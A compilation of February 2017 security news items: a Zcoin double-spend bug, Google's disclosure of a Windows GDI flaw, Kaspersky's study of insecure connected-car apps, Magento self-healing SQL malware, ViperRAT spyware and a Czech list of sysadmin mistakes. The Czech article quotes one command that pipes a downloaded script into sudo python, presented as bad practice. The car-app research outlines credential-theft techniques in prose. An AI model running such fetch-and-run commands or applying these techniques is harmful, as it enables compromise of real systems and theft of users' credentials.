Zerocoin cryptocurrency protocol is designed to implement anonymity of transactions that take full advantage of “Zero-Knowledge proofs” to ensure the complete financial privacy of users.
According to an announcement published on the project website the bug was exploited by a hacker to create Zerocoin spend transactions without a corresponding mint.
“Yesterday, our team found a bug in our implementation of Zerocoin. A typographical error on a single additional character in code allowed an attacker to create Zerocoin spend transactions without a corresponding mint.” reads the announcement. “We have identified the error and are pushing the fix urgently within the next 24 hours. We urge all pools and exchanges to update once the release is out.”
The implementation bug helped the hacker to steal 370,000 Zcoin, which correspond to $585,000 at the current price. The bug consists in an extra character left inside the source code of the currency that allowed the hacker to reuse his/her existing valid proofs to generate additional Zcoins spend transactions.
“We estimate the attacker has created about 370,000 Zcoins which has been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC,” continues the announcement.
The team said the bug was created due to one extra character left inside Zerocoin source code that allowed the unknown attacker to reuse his/her existing valid proofs to generate additional Zerocoin spend transactions.
Due to the bug, the attacker was able to spend multiple times the Zcoins used in a transaction.
ZeroCoin
Watch out, Zerocoin protocol doesn’t contain any weakness, the anonymity of currency has not been compromised, it is just an implementation bug algorithms in the currency scheme have no problems.
“We knew we were being attacked when we saw that the total mint transactions did not match up with the total spend transactions,” the team said. “If our total supply were not verifiable due to hidden amount transactions, we would not have been able to discover this bug.”
The experts at Zerocoin team believe the attacker spent a significant effort to hide their tracks by generating a large number of exchange accounts involve in several transactions over several weeks.
The development team has identified the implementation error and is pushing an update within the next 24 hours.
“We have identified the error and are pushing the fix urgently within the next 24 hours. We urge all pools and exchanges to update once the release is out.”
Microsoft failed to patch a flaw in GDI library, Google released a PoC exploit
19.2.2017 Securityaffairs Vulnerebility
Security experts at the Google Project Zero group have publicly disclosed a vulnerability affecting Microsoft’s Windows OS.
It has happened again, the hackers at Google Project Zero have publicly disclosed a vulnerability affecting Microsoft’s Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10, that had yet to be patched by the IT giant.
The experts also published a proof-of-concept exploit code.
In October, the experts at the Google Project Zero publicly disclosed a critical Windows zero-day vulnerability ten days after reporting it to Microsoft.
According to Google, the reason for going public without waiting for a patch is that its experts have observed exploits for the flaw in the wild.
According to Google disclosure timeline for vulnerability, when a flaw is exploited in the wild Google public disclosed the flaw after seven days.
Back to the present, the experts at Project Zero publicly disclosed the flaw in Windows OS because Microsoft failed to patch it within the 90-day window given by the Google.
The flaw affected the Windows’ Graphics Device Interface (GDI) library, the Google’s Project Zero member Mateusz Jurczyk reported it to the Microsoft Security Team on the 9th of June last year.
The impact of the vulnerability is serious, it affects any application that uses this GDI library. An attacker can exploit the vulnerability to steal sensitive data from the memory of the vulnerable system.
As explained before, Microsoft failed to address the flaw in the GDI library with a patch released on 15th June. The security updates did not solve all the issues in the Windows library, for this reason, the Project Zero experts report it to Microsoft with a proof-of-concept on 16th of November.
“As a result, it is possible to disclose uninitialized or out-of-bounds heap bytes via pixel colors, in Internet Explorer and other GDI clients which allow the extraction of displayed image data back to the attacker,” states Jurczyk in the second report.
Three months have passed, but Microsoft failed to solve the vulnerability so Google security experts released the details of the flaw to the public.
This implies that threat actors in the wild now can exploit the flaw in targeted attacks.
The good news, in this case, is that an attacker needs a physical access to the target machine to exploit the vulnerability.
Recently Microsoft delayed this month’s Patch Tuesday by a month due to “a last-minute issue that could impact some customers and was not resolved in time for [Microsoft’s] planned updates” on 14th February.
Experts believe that the flaw in the GDI library will remain unsolved for almost a month, this means that attackers in the wild may exploit it.
Google Discloses Windows Vulnerability That Microsoft Fails To Patch, Again!
18.2.2017 thehackernews Vulnerebility
Google Discloses Windows Vulnerability That Microsoft Fails To Patch, Again!
Microsoft is once again facing embarrassment for not patching a vulnerability on time.
Yes, Google's Project Zero team has once again publicly disclosed a vulnerability (with POC exploit) affecting Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10 that had yet to be patched.
A few months back, the search engine giant disclosed a critical Windows vulnerability to the public just ten days after revealing the flaw to Microsoft.
However, this time Google revealed the vulnerability in Windows to the public after Microsoft failed to patch it within the 90-day window given by the company.
Google's Project Zero member Mateusz Jurczyk responsibly reported a vulnerability in Windows' Graphics Device Interface (GDI) library to Microsoft Security Team on the 9th of June last year.
The vulnerability affects any program that uses this library, and if exploited, could potentially allow hackers to steal information from memory.
While Microsoft released a patch for the vulnerability on 15th June, the company did not fix all the issues in the GDI library, forcing the Project Zero researcher to once again report it to Microsoft with a proof-of-concept on 16th of November.
"As a result, it is possible to disclose uninitialized or out-of-bounds heap bytes via pixel colors, in Internet Explorer and other GDI clients which allow the extraction of displayed image data back to the attacker," Jurczyk notes in the new report.
Now, after giving the three-month grace period to the company, Google released the details of the vulnerability to the public, including hackers and malicious actors.
Google Project Zero team routinely finds security holes in different software and calls on the affected software vendors to publicly disclose and patch bugs within 90 days of discovering them. If not, the company automatically makes the flaw along with its details public.
Although Windows users need not panic, as hackers will require physical access to the host machine to exploit the vulnerability, the Redmond giant will have to release an emergency patch before sophisticated exploits are developed.
Microsoft recently delayed its this month's Patch Tuesday by a month due to "a last-minute issue that could impact some customers and was not resolved in time for [Microsoft's] planned updates" on 14th February.
So, if there is no expected emergency patch this month, this newly disclosed vulnerability will be left open for hackers for almost a month to exploit — just like we saw last time when Russian hackers actively exploited then-unpatched Windows kernel bug in the wild — which could put Windows users at potential risk.
Former employee hacked paper maker Georgia-Pacific and caused $1m damage
18.2.2017 securityaffairs Hacking
Servers at a paper maker Georgia-Pacific were hacked by a former sysadmin that was arrested by feds. The incident caused $1m in damage.
A system administrator, Brian Johnson (44) from Baton Rouge, Louisiana, has been jailed for hacking the control systems of his ex-employer.
Johnson had worked at paper maker Georgia-Pacific for years until the Valentine’s Day 2014 when he left the company and started attacking it. The company produces paper towels and tissues, it has 200 facilities across the US and 35,000 employees.
Johnson maintained active its VPN connection to the systems at Georgia-Pacific even after he left the company and accessed the servers to install its own software and interfere with industrial control systems (ICS) in the plant.
The former sysadmin launched the attack against the company that lasted two weeks and caused roughly $1.1m million dollars in damage.
Experts that investigated the incident focused the analysis on the timing of the attacks, the cyber incursion started after the sysadmin was fired. On February 27, the FBI raided Johnson’s home and found a VPN connection into the company’s servers on his laptop.
A forensic investigation allowed law enforcement to collect evidence of the attack on the company server.
According to the indictment, Johnson pleaded guilty to hacking and willful damage charges.
Last week, the Louisiana district courts estimated the overall damages caused by the man at $1,134,828 of lost, and he ordered the man to repay.
The man has to serve a sentence of 34 months in prison.
“This case is a powerful reminder of the very real threat and danger that businesses and individuals face from cyberattacks and other cyber-related criminal activity,” said United States Attorney Walt Green. “The best defense to these sorts of attacks includes security, training, and continued vigilance at the facility level.”
Dissecting Malware
18.2.2017 Kaspersky Virus
There are just a handful of reverse engineers clustered at the very top of the information security profession. From March 30 through April 2, 2017, one of them — Principal Security Researcher at Kaspersky Lab Nicolas Brulez — will deliver a course on the subject he has been training people around the world on for 12 years, malware reverse engineering. You won’t be stumped for days on end by reversing challenges anymore, because you’ll take away from St. Maarten tricks and efficient moves to reverse faster.
At Kaspersky Lab’s SAS 2017, those who are trying to break into the next level of digital investigation and malware analysis will benefit greatly — the SAS team has prepared three dedicated courses. Students will find out how to hunt for rare samples, study link analysis to see hidden connections, and learn reverse engineering techniques to see how the malicious code actually works.
You can take advantage of these “surgical” studies if you’re a practitioner of malware research, do forensics or incident response, or deal with reversing in general. You need to know assembly language and how to use tools such as debuggers and disassemblers (IDA). If you were analyzing code 10 years ago, you’ll find it easy to jump back into reversing. The good thing about it is that the tools and techniques remain almost the same, so reverse engineers just have to adapt a little bit to new technologies. Join the training to make sure that the world hasn’t turn upside down while you were chilling.
Journey to the inside of famous malware
Each day the students will practice reverse engineering skills on samples from such malicious programs as Cloud Atlas, MiniDuke or Red October that can be applied to modern analysis. The course program will help you develop the following skills:
Unpacking malware manually
Packers have been around for more than 10 years. In all this time they have had just one aim: making malware analysis more difficult and time-consuming. As it is time which is crucially important for a researcher, unpacking samples quickly is the goal of Day 1 of the training. Be ready to unpack some of the “celebrities” of the malware universe.
Actual malware analysis
After Day 2 you will be able to perform static shell code analysis using IDA as if you had never stopped doing it. You quickly take code from one sample hashing algorithm and easily re-implement it. Other exercises are included too, such as analyzing MiniDuke, which is written in machine assembly language and has an extremely small and unsuspicious file size.
Dissecting APTs
The last two days gives you the chance to practice what you learned in the first two days. You will define the components of malware and observe its functions, investigating the way it communicates with C&C servers. Only an understanding of how malware works will allow an IT security expert to stop the infection.
Hardware requirements
Legitimate version of IDA Pro
Virtual Machine with Windows XP SP3 installed (to avoid compatibility issues)
OllyDbg
Python 2.7
PE Editor (e.g. LordPE or other)
Hex Editor (e.g. Hiew or other)
Import Reconstructor/fixer: Imprec, Universal Import Fixer 1.2
PEID
The class is limited to a maximum of 20 participants — so book a seat at sas.kaspersky.com to be sure you are on the list.
Mobile apps and stealing a connected car
18.2.2017 Kaspersky Mobil
The concept of a connected car, or a car equipped with Internet access, has been gaining popularity for the last several years. The case in point is not only multimedia systems (music, maps, and films are available on-board in modern luxury cars) but also car key systems in both literal and figurative senses. By using proprietary mobile apps, it is possible to get the GPS coordinates of a car, trace its route, open its doors, start its engine, and turn on its auxiliary devices. On the one hand, these are absolutely useful features used by millions of people, but on the other hand, if a car thief were to gain access to the mobile device that belongs to a victim that has the app installed, then would car theft not become a mere trifle?
In pursuing the answer to this question, we decided to figure out what an evildoer can do and how car owners can avoid possible predicaments related to this issue.
Potential Threats
It should be noted that car-controlling apps are quite popular – most popular brands release apps whose number of users is between several tens of thousands and several million people. As an example, below are several apps listed with their total number of installations.
For our experiments, we took several apps that control cars from various manufacturers. We will not disclose the app titles, but we should note that we notified the manufacturers of our findings throughout our research.
We reviewed the following aspects of each app:
Availability of potentially dangerous features, which basically means whether it is possible to steal a car or incapacitate one of its systems by using the app;
Whether the developers of an app employed means to complicate reverse engineering of the app (obfuscation or packing). If not, then it won’t be hard for an evildoer to read the app code, find its vulnerabilities, and take advantage of them to get through to the car’s infrastructure;
Whether the app checks for root permissions on the device (including subsequent canceled installations in case the permissions have been enabled). After all, if malware manages to infect a rooted device, then the malware will be capable of doing virtually anything. In this case, it is important to find out if developers programmed user credentials to be saved on the device as plain text;
Whether there is verification that it is the GUI of the app that is displayed to the user (overlay protection). Android allows for monitoring of which app is displayed to the user, and a malware can intercept this event by showing a phishing window with an identical GUI to the user and steal, for instance, the user’s credentials;
Availability of an integrity check in the app, i.e., whether it verifies itself for changes within its code or not. This affects, for example, the ability of a malefactor to inject his code into the app and then publish it in the app store, keeping the same functionality and features of the original app.
Unfortunately, all of the apps turned out to be vulnerable to attacks in one way or another.
Testing the Car Apps
For this study, we took seven of the most popular apps from well-known brands and tested the apps for vulnerabilities that can be used by malefactors to gain access to a car’s infrastructure.
The results of the test are shown in the summary table below. Additionally, we reviewed the security features of each of the apps.
App App features App code obfuscation Unencrypted username and password Overlay protection for app window Detection of root permissions App integrity check
App #1 Door unlock No Yes (login) No No No
App #2 Door unlock No Yes (login & password) No No No
App #3 Door unlock; engine start No – No No No
App #4 Door unlock No Yes (login) No No No
App #5 Door unlock; engine start No Yes (login) No No No
App #6 Door unlock; engine start No Yes (login) No No No
App #7 Door unlock; engine start No Yes (login & password) No No No
App #1
The whole car registration process boils down to entering a user login and password as well as the car’s VIN into the app. Afterwards, the app shows a PIN that has to be entered with conventional methods inside the car so as to finalize the procedure of linking the smartphone to the car. This means that knowing the VIN is not enough to unlock the doors of the car.
The app does not check if the device is rooted and stores the username for the service along with the VIN of the car in the accounts.xml file as plain text. If a Trojan has superuser access on the linked smartphone, then stealing the data will be quite easy.
App #1 can be easily decompiled, and the code can be read and understood. Besides that, it does not counter the overlapping of its own GUI, which means that a username and password can be obtained by a phishing app whose code may have only 50 lines. It should be enough to check which app is currently running and launch a malicious Activity with a similar GUI if the app has a target package name.
In order to check for integrity verification, we modified the loginWithCredentials method.
In this case, a username and password will simply be shown on the screen of a smartphone, but nothing prevents embedding a code to send credentials to a criminal’s server.
The absence of integrity verification allows any interested individual to take the app, modify it at his own discretion, and begin distributing it among potential victims. Signature verification is sorely lacking. There is no doubt that such an attack will require an evildoer to make some effort – a user has to be conned into downloading the modified version of the app. Despite that, the attack is quite surreptitious in nature, so the user will not notice anything out of the ordinary until his car has been stolen.
What is nice, however, is that the app pulls SSL certificates to create a connection. All in all, this is reasonable enough, as this prevents man-in-the-middle attacks.
App #2
The app offers to save user credentials but at the same time recommends encrypting the whole device as a precaution against theft. This is fair enough, but we are not going to steal the phone – we are just “infecting” it. As a result, there is the same trouble as found in App #1: the username and password are stored as plain text in the prefs file.{?????????}.xml file (the question marks represent random characters generated by the app).
The VIN is stored in the next file.
The farther we go, the more we get. The developers did not even find time to implement integrity verification of the app code, and, for some reason, they also forgot about obfuscation. As a consequence of that, we easily managed to modify the LoginActivity code.
Thus, the app preserved its own functionality. However, the username and password that had been entered during registration were displayed on the screen immediately after a login attempt.
App #3
Cars paired to this app are optionally supplied with a control module that can start the engine and unlock the doors. Every module installed by the dealer has a sticker with an access code, which is handed over to the car owner. This is why it is not possible to link the car to other credentials, even if its VIN is known.
Still, there are other attack possibilities: first, the app is tiny, as its APK size amounts to 180 kilobytes; secondly, the entire app logs its debugging data onto a file, which is saved on an SD card.
Logging at the start of LoginActivity
The location for dumping the log file
It’s a bit of bad luck that logging is enabled only when the following flag is set up in the app: android:debuggable=”true”. The public version of the app does not have the flag for obvious reasons, but nothing can stop us from inserting it into the app. To do that, we shall use the Apktool utility. After launching the edited app and attempting to log in, the SD card of the device will create a marcsApp folder with a TXT file. In our case, the username and password of the account have been output into the file.
Of course, persuading the victim to remove the original app and install an identical one with the debugging flag is not that easy. Nevertheless, this shuffling can be performed, for example, by luring the victim to a website where the edited app and installation manual can be downloaded as a critical update. Empirically, virus writers are good at employing social engineering methods such as this one. Now, it isn’t a big deal to add to the app the ability to send a log file to a designated server or a phone number as an SMS message.
App #4
The app allows binding of the existing VIN to any credentials, but the service will certainly send a request to the in-dash computer of the car. Therefore, unsophisticated VIN theft will not be conducive to hacking the car.
However, the tested app is defenseless against overlays on its window. If, owing to that, an evildoer obtains the username and password for the system, then he will be able to unlock the doors of the car.
Regretfully enough, the app stores the username for the system as well as a plethora of other interesting data, such as the car’s make, the VIN, and the car’s number, as clear text. All of these are located in the MyCachingStrategy.xml file.
App #5
In order to link a car to a smartphone that has the app installed, it is necessary to know the PIN that will be displayed by the in-dash computer of the car. This means that, just like in the case with the previous app, knowing the VIN is not enough; the car must be accessed from the inside.
App #6
This is an app made by Russian developers, which is conceptually different from its counterparts in that the car owner’s phone number is used as authorization. This approach creates a fair degree of risk for any car owner: to initiate an attack, just one Android API function has to be executed to gain possession of the username for the system.
App #7
For the last app that we reviewed, it must be noted that the username and password are stored as plain text in the credentials.xml file.
If a smartphone is successfully infected with a Trojan that has superuser permissions, then nothing will hinder the effortless theft of this file.
Opportunities for Car Theft
Theoretically, after stealing credentials, an evildoer will be able to gain control of the car, but this does not mean that the criminal is capable of simply driving off with it. The thing is, a key is needed for a car in order for it to start moving. Therefore, after accessing the inside of a car, car thieves use a programming unit to write a new key into the car’s on-board system. Now, let us recall that almost all of the described apps allow for the doors to be unlocked, that is, deactivation of the car’s alarm system. Thus, an evildoer can covertly and quickly perform all of the actions in order to steal a car without breaking or drilling anything.
Also, the risks should not be limited to mere car theft. Accessing the car and deliberate tampering with its elements may lead to road accidents, injuries, or death.
None of the reviewed apps have defense mechanisms. Due credit should be given to the app developers though: it is a very good thing that not a single of the aforementioned cases uses voice or SMS channels to control a car. Nonetheless, these exact methods are used by aftermarket alarm-system manufacturers, including Russian ones. On the one hand, this fact does not come as a surprise, as the quality of the mobile Internet does not always allow cars to stay connected everywhere, while voice calls and SMS messages are always available, since they are basic functions. On the other hand, this creates supernumerary car security threats, which we will now review.
Voice control is handled with so-called DTMF commands. The owner literally has to call up the car, and the alarm system responds to the incoming call with a pleasant female voice, reports the car status, and then switches to standby mode, where the system waits for commands from the owner. Then, it is enough to dial preset numbers on the keypad of the phone to command the car to unlock the doors and start the engine. The alarm system recognizes those codes and executes the proper command.
Developers of such systems have taken care of security by providing a whitelist for phone numbers that have permission to control the car. However, nobody imagined a situation where the phone of the owner is compromised. This means that it is enough for a malefactor to infect the smartphone of a victim with an unsophisticated app that calls up the alarm system on behalf of the victim. If the speakers and screen are disabled at the same time, then it is possible to take full command of the car, unbeknownst to the victim.
Certainly though, not everything is as simple as it seems at first glance. For example, many car enthusiasts save the alarm-system number under a made-up name, i.e. a successful attack necessitates frequent interaction of the victim with the car via calls. Only this way can an evildoer that has stolen the history of outgoing calls find the car number in the victim’s contacts.
The developers of another control method for the car alarm system certainly have read none of our articles on the security of Android devices, as the car is operated through SMS commands. The thing is, the first and most common mobile Trojans that Kaspersky Lab faced were SMS Trojans, or malware that contains code for sending SMS surreptitiously, which was done through common Trojan operation as well as by a remote command issued by malefactors. As a result, the doors of a victim’s car can be unlocked if malware developers perform the following three steps:
Go through all of the SMS messages on the smartphone to look for car commands.
If the needed SMS messages have been located, then extract the phone number and password from them in order to gain access.
Send an SMS message to the discovered number that unlocks the car’s doors.
All of these three steps can be done by a Trojan while its victim suspects nothing. The only thing that needs to be done, which malefactors are certainly capable of handling, is to infect the smartphone.
Conclusion
Being an expensive thing, a car requires an approach to security that is no less meticulous than that of a bank account. The attitude of car manufacturers and developers is clear: they strive to fill the market quickly with apps that have new features to provide quality-of-life changes to car owners. Yet, when thinking about the security of a connected car, its infrastructure safety (for control servers) and its interaction and infrastructure channels are not the only things worth considering. It’s also worth it to pay attention to the client side, particularly to the app that is installed on user devices. It is too easy to turn the app against the car owner nowadays, and currently the client side is quite possibly the most vulnerable spot that can be targeted by malefactors.
At this point, it should be noted that we have not witnessed a single attack on an app that controls cars, and none of the thousands of instances of our malware detection contain a code for downloading the configuration files of such apps. However, contemporary Trojans are quite flexible: if one of these Trojans shows a persistent ad today (which cannot be removed by the user himself), then tomorrow it can upload a configuration file from a car app to a command-and-control server at the request of criminals. The Trojan could also delete the configuration file and override it with a modified one. As soon as all of this becomes financially viable for evildoers, new capabilities will soon arrive for even the most common mobile Trojans.
Germany Bans Internet-connected 'Spy' Doll Cayla
18.2.2017 securityweek Security
German regulators have banned an internet-connected doll called "My Friend Cayla" that can chat with children, warning Friday that it was a de facto "spying device".
Parents were urged to disable the interactive toy by the Federal Network Agency which enforces bans on surveillance devices.
"Items that conceal cameras or microphones and that are capable of transmitting a signal, and therefore can transmit data without detection, compromise people's privacy," said the agency's head, Jochen Homann.
"This applies in particular to children's toys. The Cayla doll has been banned in Germany. This is also to protect the most vulnerable in our society."
The doll works by sending a child's audio question wirelessly to an app on a digital device, which translates it into text and searches the internet for an answer, then sends back a response that is voiced by the doll.
The German regulators in a statement warned that anything a child says, or other people's conversations, could be recorded and transmitted without parents' knowledge.
"A company could also use the toy to advertise directly to the child or the parents," it said.
"Moreover, if the manufacturer has not adequately protected the wireless connection, the toy can be used by anyone in the vicinity to listen in on conversations undetected."
Genesis Toys, which manufactures the doll, says on its website that it "is committed to protecting your and your family's personal information.
"Our objective is to ensure that our products and services are safe and enjoyable for our customers".
It also says Cayla "is programmed to not utter, display or say words or images that would be inappropriate for children to see or hear".
The company regularly reviews "encryption and physical security measures" to guard against unauthorized access to customers' personal information.
But it warns on its website that "unfortunately no method of transmission over the Internet, or method of electronic storage, is 100 percent secure".
The regulation agency added that it would "inspect other interactive toys and, if necessary, will take further action".
The European Consumer Organization said it welcomed the decision but criticized the fact consumers would struggle to get compensation.
Its head Monique Goyens said that "if connected toys, such as this speaking doll, can be hacked to spy on or talk to children, they must be banned."
She added that "EU product laws need to catch up with digital developments to deal with threats such as hacking, data fraud or spying".
Self-Healing Malware Hits Magento Stores
18.2.2017 securityweek Virus
A newly discovered piece of malware targeting Magento stores has a self-healing routine to restore itself after deletion, security researchers have discovered.
Self-healing malware isn’t new, with the first such threat reportedly spotted nearly three decades ago, as the memory-residing Trojan called Yankee Doodle, which could infect .com and .exe files. Discovered in September 1989, this piece of malware would play the tune “Yankee Doodle” every day at 17:00 if it was in memory.
Discovered by Jeroen Boersma, the recently spotted Magento-targeting malware is using a database trigger to restore itself in the event it has been deleted: every time a new order is made, injected SQL code searches the compromised Magento installation and, if it doesn’t find the malware, it re-adds it. The malware leverages SQL stored procedures for this operation.
According to Willem de Groot, who analyzed the threat, the malware’s infection point was a brute force attack on /rss/catalog/notifystock/ where the compromised shop was “otherwise completely patched.”
De Groot notes that the malware’s behavior renders previous cleaning routines useless, because removing the malicious code from the infected records will no longer ensure that the infection is gone. This would only work for regular Javascript-based malware, which normally gets injected in the static header or footer HTML definitions in the database.
The newly observed malware ensures that the self-healing trigger is executed every time a new order is made. “The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself,” the security researcher explains.
According to de Groot, malware detection should now include database analysis as well, because file scanning is no longer efficient. “This discovery shows we have entered a new phase of malware evolution,” he notes.
The security researcher, who says this is the first malware written in SQL he has encountered to date, explains that, while Magento Enterprise and some community extensions contain legitimate triggers, Magento store owners should be able to detect the malware by searching for suspicious SQL code, “such as anything containing admin, .js, script or < (html tags).”
The researcher, who updated his Malware Scanner to detect the new patterns, also provides instructions on how to remove the infection after discovering suspicious code in a Magento installation. Magereport was also updated with the new patterns, he said.
Nejhloupější chyby systémových správců
18.2.2017 SecurityWorld Zabezpečení
Dělejte to tak, jak říkám, a nikoliv tak, jak to dělám já: Chyby firemních IT administrátorů často předčí závažnost těch, kterých se dopouštějí uživatelé. Tady je deset nejčastějších.
Zabezpečení není čistě technický problém – je to potíž související s lidmi. Do sítě sice můžete integrovat mnoho technologií, ale nakonec někdo může udělat hloupé lidské chyby.
A co je nejhorší? Těchto přehmatů se často dopouštějí právě ti, kteří by měli nejlépe vědět, jak se jim vyhnout: správci systémů a další personál IT.
Loňská zpráva o riziku vnitřních hrozeb (Insider Risk Report 2015) společnosti Intermedia uvádí, že IT profesionálové byli nejpravděpodobnější skupinou dopouštějící se „nebezpečných“ prohřešků vůči zabezpečení, jako jsou sdílení přihlašovacích údajů, používání osobních hesel pro podnikové účely a poskytování přihlašovacích údajů osobního účtu dalším osobám.
Takové chyby bývají mnohem rizikovější než ty, kterých se dopustí běžní uživatelé, a to v důsledku neomezených pravomocí, jimiž správci velmi často v rámci sítě disponují.
IT profesionálové mohou stejně jako uživatelé podlehnout phishingu, malwaru a dalším útokům – a odcizené přihlašovací údaje správců systému mají téměř vždy za následek mnohem vážnější narušení bezpečnosti.
Zde je deset obvyklých bezpečnostních chyb, které dělají správci systému a další IT personál.
Chyba č. 1: Používání příkazu sudo pro všechno
Když se přihlásíte jako takzvaný root, získáte nad systémem plnou kontrolu. To může být velmi nebezpečné, protože pokud dojde k odcizení vašich přihlašovacích údajů, mohou útočníci dělat, cokoli se jim zachce (pokud se to převede do pojetí operačního systému Windows – není nutné se přihlašovat pomocí účtu Administrator, když nemáte v úmyslu dělat činnosti vyžadující úroveň správce).
Namísto přímého přihlášení do systému jako root se přihlaste prostřednictvím svého osobního účtu a v případě potřeby použijte příkaz sudo pro konkrétní příkazy.
Je ale snadné udělat chybu, pokud si nedáte pozor. Nějaký skript neproběhne úspěšně, protože jeden z příkazů potřeboval sudo, a nyní se musí vše spustit znovu. Pokud nevysledujete, který z příkazů vyžadoval zvýšení oprávnění a kde to naopak není potřebné, možná nakonec spustíte vše pomocí příkazu sudo.
Chyba č. 2: Spouštění skriptů neznámého původu
Instalace linuxových aplikací třetích stran je další oblastí, kde může dojít ke zneužití příkazu sudo. Jediné, co musíte udělat, je zkopírovat a vložit příkaz (který je již nastavený k využití sudo) přímo do terminálu, aby došlo ke spuštění instalačního skriptu. Každý jednotlivý příkaz v takovém skriptu bude potom vykonán se zvýšenými oprávněními.
Zde je příklad zkopírovaný z webu (se skrytou adresou URL):
sudo -v && wget -nv -O- https://xxx/xxx/linux-installer.py | sudo python -c "import sys; main=lambda:sys.stderr.write('Download failed\n'); exec(sys.stdin.read()); main()"
To poskytne oprávnění sudo položce hostované kdekoli na webu, stejně jako místní instanci příkazů v jazyce Python. To v žádném případě nelze doporučit! Správci operačního systému Windows čelí podobným potenciálním katastrofám spuštěním stažených skriptů PowerShell.
Dokonce i když důvěřujete zdroji, nikdy nepředpokládejte, že je skript stažený z internetu bezpečný. Vždy nejprve zkontrolujte obsah skriptu a ověřte, zda spouštěné příkazy nemají nežádoucí účinek.
Chyba č. 3: Spouštění privilegovaných služeb s právy účtu root
Aplikace by se nikdy neměly spouštět jako root. Vytvořte jedinečné účty pro služby s velmi specifickými oprávněními pro každou aplikaci a službu spuštěnou v počítači.
Účty služeb obvykle nemají domácí adresáře a jejich práva práce se souborovým systémem jsou omezená i v případě, že by se někdo pokusil přihlásit pomocí takového účtu. Pokud útočníci zneužijí účet služby, musí se jim ještě podařit spuštění nějakého lokálního exploitu pro získání dalších práv pro spuštění kódu.
Každá aplikace by měla použít vlastní účet pro přístup k databázi namísto účtu root, respektive Administrator. Webové aplikace by měly být ve vlastnictví odpovídající skupiny a uživatele. Při přiřazování oprávnění domény aplikacím Windows nedávejte aplikaci přístup na úrovni správce.
Hlavní linuxové distribuce se ve výchozím stavu starají o účty služeb, ale pokud správce ručně konfiguruje balíčky třetích stran, může snadno udělat chybu.
Nezapomeňte také přepnout oprávnění po dokončení instalace a konfigurace, aby účet root, respektive Administrator nebyl vlastníkem příslušné aplikace.
Chyba č. 4: Používání stejných hesel
Klidně můžete vytřeštit oči. Všichni jsme slyšeli o zlu používání stejných hesel pro různé weby, systémy a aplikace. Faktem však zůstává, že to zůstává velkým problémem a že také správci systémů vůči němu nejsou imunní.
Nedávno Mozilla oznámila, že se do privilegovaného uživatelského účtu naboural neznámý útočník, vnikl do databáze Bugzilla pro sledování chyb a ukradl informace o 53 kritických zranitelnostech.
Ukázalo se, že onen „privilegovaný uživatel“ použil heslo pro databázi Bugzilla na jiném webu a tam došlo k jeho vyzrazení.
V mnoha případech se servery nakonfigurovávají se slabými hesly správce nebo se stejnými hesly, jako mají další počítače v síti.
Útoky hrubou silou pomocí běžných hesel a slovníkových slov pořád fungují, protože dost lidí stále dělá tuto základní chybu. Když má více počítačů stejné heslo, tento problém se ještě umocňuje.
Namísto nastavení stejného hesla na všech počítačích by měli správci zvolit použití souboru s klíčem. Každý server by měl mít soubor veřejného klíče a pracovní stanice správce systému by měla mít privátní klíč odpovídající takovému veřejnému klíči.
Tímto způsobem může správce přistupovat ke všem počítačům umístěným v síti, ale útočník pohybující se v síti laterálně se nebude moci přihlásit bez platného klíče. V takovém případě totiž neexistuje heslo, které by bylo možné zachytit.
Chyba č. 5: Sdílení účtů správce
Účty správce, jako je přístup k databázi a portálům správy, jsou v síti často sdílené. Namísto nastavení prostředí tak, aby správci vyžadovali zvýšená oprávnění až v případě potřeby, jsou tyto účty správců různě sdílené. A to přímo přivolává problémy.
V ideálním případě by měly existovat oddělené účty: jeden účet root a potom by měl mít každý správce svůj vlastní účet. Účty správců by neměly po přihlášení disponovat nejvyšší úrovní přístupu – správce si může v případě práce na specifických úkolech vyžádat speciální přístupová práva.
Zpráva společnosti Intermedia uvádí, že 32 procent IT profesionálů poskytlo své přihlašovací údaje s heslem také dalším zaměstnancům.
Je dost špatné nevědět, kdo přesně používá účty správce, ale ještě horší je, že hesla se jen zřídka mění, když správce opouští firmu. A protože se hesla nemění pravidelně, mohou je někdejší kolegové zneužít a způsobit beztrestně škodu.
Průzkum Intermedie zjistil, že jeden z pěti IT profesionálů uvedl, že by přistupoval k informacím společnosti i poté, co by opustil své současné zaměstnání.
Zásady změn hesel tedy zcela jistě nejsou určené jen pro koncové uživatele. Pravidelně měňte hesla, zejména u účtů správců a u služeb. A hesla změňte vždy, když firmu opustí příslušný administrátor.
Chyba č. 6: Ponechání nastavení pro řešení problémů
Při odstraňování problémů můžete dělat různé triky a experimenty, aby se vám podařilo problém odhalit a vyřešit ho. Při těchto pokusech bývá tendence obejít obvyklé procesy.
Problém nastává, když dojde k vyřešení problému a přechodu na další. Správci mohou ve spěchu zapomenout a něco zanechat ve stavu, který umožňuje zneužití.
Možná jste otevřeli porty ve firewallu – například když jste se snažili přijít na to, proč aplikace neodpovídá. Jakmile se to ale opraví, musíte se vrátit a tyto porty zavřít dříve, než je zneužijí útočníci.
Hackers Are Using Android Malware To Spy On Israeli Military Personnel
17.2.2017 thehackernews Android
A group of highly sophisticated state-sponsored hackers is spying on the Israeli military by hacking into the personal Android phones of individual soldiers to monitor their activities and steal data.
A newly released research by Lookout and Kaspersky suggests that more than 100 Israeli servicemen from the Israeli Defense Force (IDF) are believed to have been targeted with spyware.
Dubbed ViperRAT, the malware has specifically been designed to hijack Israeli soldiers’ Android-based smartphones and remotely exfiltrate data of high value, including photos and audio recordings, directly from the compromised devices.
Modus Operandi Identified
According to the security firms, IDF personnel had been compromised by social engineering techniques — where the soldiers were lured via Facebook Messenger and other social networks into entering communications with hackers who posed as attractive women from various countries like Canada, Germany, and Switzerland.
The soldiers were then tricked into installing a trojanized version of two different, typically legitimate Android chat apps, SR Chat and YeeCall Pro, for easier communication.
The malware has also been distributed using a dropper hidden in other Android smartphone applications including a billiards game, an Israeli Love Songs player, and a Move To iOS app, which are common to Israeli citizens and available in the Google Play store.
The app then scanned soldiers' smartphones and downloaded another malicious application that masqueraded as an update for one of the already installed apps, such as WhatsApp, and tricked victims to allow various permissions in order to carry out surveillance.
This, in turn, allowed the attackers to execute on demand commands, enabling them to control phone's microphone and camera, eavesdrop on soldiers' conversations, and peer into live camera footage.
Besides this, the ViperRAT malware gathers a broad range of data from compromised devices including geolocation, call log, personal photos, SMS messages, cell phone tower information, network and device metadata, internet browsing, and app download history.
